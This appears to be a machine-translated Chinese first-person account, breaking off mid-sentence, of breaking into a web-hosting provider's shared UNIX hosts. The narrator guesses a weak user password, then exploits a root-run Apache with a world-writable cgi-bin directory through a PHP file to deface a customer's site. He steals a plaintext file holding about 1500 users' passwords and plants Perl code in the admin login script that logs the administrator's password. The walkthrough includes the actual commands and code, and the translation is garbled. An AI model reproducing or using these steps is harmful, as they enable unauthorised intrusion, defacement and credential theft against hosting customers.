Check the security of the VM system by intruding the instance

Article Title: Check the security of the VM system by intruding an instance. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
In fact, I have long had the idea of writing this article, but I have never written it because I am afraid this is invisible to some people who are happy with it, but think about how much pressure may be put on some IDCs to strengthen some security measures. Otherwise, it would be hard for the vast number of VM users, I don't know what happened when I got hacked. Of course, when I wrote this article, I was sure that most of the problems I mentioned had been solved, the IP address, domain name, user name, password, path, file name, and so on described below have been replaced by me. They are not actual and are combined with more than two service providers, you do not need to picture my remarks on any web hosting service provider in China.
　　
This happened half a year ago. At that time, 20 CN was not yet established. For some reason, I want to kill a website. (Yes, that's it. Don't think too well ), first of all, I need to find a scanner to scan the port and find that this is a very standard UNIX host, with telnet, ftp, smtp, pop, and so on, and so many ports on, it seems very easy to do, at that time, who knows to take a closer look, there are no intermediate or higher vulnerabilities in each service program version, not only remote overflow, but not even local ones, I had to try to see if there were any CGI vulnerabilities and there was almost no usable vulnerability. I went around on his website and found a program registered as a member, in order to get further information, I registered, the results received an email, found that the sender is a ab1234@abc.com, but the domain name of this website is indeed def.com, strange, according to this, this seems to be a virtual host. on IE, enter IP202.96.100.10 to see what the result shows: What is the XXX virtual host of xxx company? # * #% @! % ^ & # * # @ Million ads. That's right. This is a virtual host. The user name on this host is ab1234, and the user name is obtained. The ftp is simple and useless. It seems that the password is still set well. Since you cannot break it, then the distance between others and you will be a little closer, so let's look at what others are doing, so we will come from user ab1200 -- ab1300 one by one, and soon, the password for ab1210 is a simple 8888 code. I use user: ab1210 pass: 8888 to telnet in, but what I want to kill is ab1234 instead of ab1210, so go to the ab1234 directory.
% Cd \
% Cd home
% Ls
A bunch of User Directories
% Cd ab1234
: Permission denied
That's right. It's normal. You cannot enter the directories of other users, but it's okay. Now that you have come in, there will be 80% chances to kill him. Now let's look around and talk about it, it turns out that this host runs three independent apache, one on port 80, the other on port 91, and the other on port 92,80. But what are the tasks of ports 91 and 92? Let's take a look. on IE, enter http: // 202.96.100.10: 91/to open the authentication dialog box, it turned out to be a user management interface. You can set up emails and change passwords here. Since web can do these tasks, it seems impossible for apache to run as a nobody, find his httpd. conf: day ~~~~~~, User root, which means that if any file in the cgi-bin directory of apache can be written to another user, I can be root, but not the root on the console, I must modify the content of the writable file to make it my command, and then run it using apache in the browser. Therefore
% Cd/var/www/manager/cgi-bin
% Ls
: Permission denied
Sorry, but it cannot be read.
% Cd ..
% Ls
: Permission denied
　　
$ Cd ..
% Ls
% Htdocs cgi-bin backup manager
Backup, backup. Generally, administrators generally do not set permissions for saving time during backup to see if they can
% Cd backup
%
Yes
% Ls-la
Drwxr-xr-x 7 root wheel 512 Jul 20 07:02.
Drwxr-xr-x 4 root wheel 512 Jul 3 ..
......
-Rw-r -- 1 root wheel 25642628 Jul 3 manager_00_05_12.tar
......
No, there is a backup of the manager directory, or 644. You can go back and take a look at it. Copy It To The htdocs directory of ab1210, which is the root directory of the user's website of ab1210.
% Cp manager_00_05_12.tar/home/ab1210/htdocs/manager.tar
% Cd
% Cd htdocs
This manager.tar is very large, 25 M. compress it, open IE download, enter the http: // ab1210 domain name/manager.tar.gz, and check it locally. After half an hour, finally, I figured out the principle of this program and found out the important files in those directories, including userpw, which seems to have a user's plaintext password file under/home/sysadm, I also know that there is a data directory under the cgi-bin directory of apache that can be written by anyone. This is easy to do.
% Cd/var/www/manager/cgi-bin/data
% Touch hacked.html
% Touch cp. php3
% Vi hacked.html
　　
You cannot enter Chinese characters.
　　
: Wq
%
% Vi cp. php3
　　 Copy ("/var/www/manager/cgi-bin/data/hacked.html", "/home/ab1234/htdocs/index.html ");
?>
: Wq
%
Next, use IE to open http: // 202.96.100.10: 91/cgi-bin/data/cp. php3 is blank. It's just finished. Open the website's home page and check it out. That's right. You just changed the website!
　　
At this point, the task of killing the station is completed, but I am interested in looking at some sensitive data in the host, and use the method just now to change the cp. in php3, write all the files to be obtained, copy all the files to the htdocs directory of ab1210, pack the files, and download them with IE, the plaintext Password File userpw under/home/sysadm is indeed the list of usernames and passwords of all users on this host, this seems to be used to retrieve files that forget the password. Haha, including the password of the ab1234 website to be killed, the passwords of a total of 1500 users are in my hands, by analyzing the programs in the downloaded manager directory and those files, I have already understood the structure of this host, also found that the sysadm user seems to have high permissions, and it is in the wheel group, with the su root power, curiosity prompted me to further explore his entire cluster.
　　
Of course, I can use the method just now to write a script to change the password of sysadm or root, and then do whatever I want, but in this way, I may not be able to enter tomorrow, they found that the root password has been changed and will surely find out the problem. Now we need the sysadm password, which is missing in the userpw, I guess the sysadm password for each of their hosts should be the same, so that I can get control of other hosts, but I still don't know what to do yet, so let's take a look at what apache is running on port 92. Let's also look at it with IE. For http: // 202.96.100.10: 92/, we still need to enter the password, enter ab1210, 8888 then, he also included the program running on port 92. He found that the program was used internally to manage users. The administrator can add and delete users through this program, set user space restrictions and so on. This program has strict login restrictions. In addition to apache directory protection, there are also IP segment restrictions, allowing only one specific IP segment to log on, in addition, only the usernames listed in the/etc/usercan file can be logged on. The password still uses the system password. I have not retrieved the usercan file, now we can copy the file to the directory of ab1210 by modifying the homepage.
　　
% Cat usercan
Sysadm
That's right. Only one person can log on to sysadm. What I need now is the sysadm password. Of course, I have also retrieved the shadow password file, however, I think the password should not be simple, and it is obviously not a way to do this, so I modified the index of the identity authentication program. cgi, added the following code
Open (FH, ">/etc/passwd.org ");
Print FH "$ passwd \ n ";
Close (FH );
In this way, when the Administrator logs on, his password will be written to the/etc/passwd.org file. I just need to wait for him to log on. After the change, I will use ftp to upload the file, we still use the method we just used, but this time we moved back to overwrite the original index on the system. cgi.
　　
Next, of course, it is to clear all the traces that have just been left behind. The next day, continue to log on with ab1210
% Cat/etc/passwd.org
Cat: passwd.org: No such file or directory
Now the administrator hasn't logged on yet, so I have to wait. At night, I log on again,
% Cat/etc/passwd.org
D1C2B3A4
D1C2B3A4
%
In this way, I got a sysadm user that should be able to log on to each of their hosts and belong to the same root group. The password is D1C2B3A4. I have read/etc/ttys, although sysadm cannot log on from another IP address on that management system, the operating system itself does not restrict sysadm from telnet.
　　
Next, let's take a look at the number of hosts like this. The method is very simple. In the IP segment 202.96.100, we can scan for the port 91. If there are 6 hosts, try it, if it succeeds, you can enter and confirm that my idea is correct. sysadm can log on to any host and the password is the same. So far, the killing power of the websites of thousands of customers on all UNIX virtual hosts in this IDC is in my hands, as long as my mind gets hot, A simple script can be used to change the home pages of all these websites. as long as several # s are added to the management program, all users can be deleted, fortunately, during that time, I had a hot hit with the online MM, and the business was also a little bit of money, and the mood was still very good. Otherwise, there may not be 20 CN, and you will not see this article, if I modified or deleted them at the time, I would be much more famous today than Hongke, but now I may be staying in jail.
　　
Well, this intrusion may have been completed. According to the usual method of intruding an instance, it seems that when I want to say it, I will send an email to the Administrator to inform the problem, but you are wrong. I didn't do this. Why? Next Decomposition
　　
Although I have actually controlled all of his UNIX hosts and have long been granted root permissions, I still don't know the root password, how can I get this password? This is of course a type, but even if I know the root password, I don't want to do anything. Why bother with this? So I decided to steal the day and day, even though sysa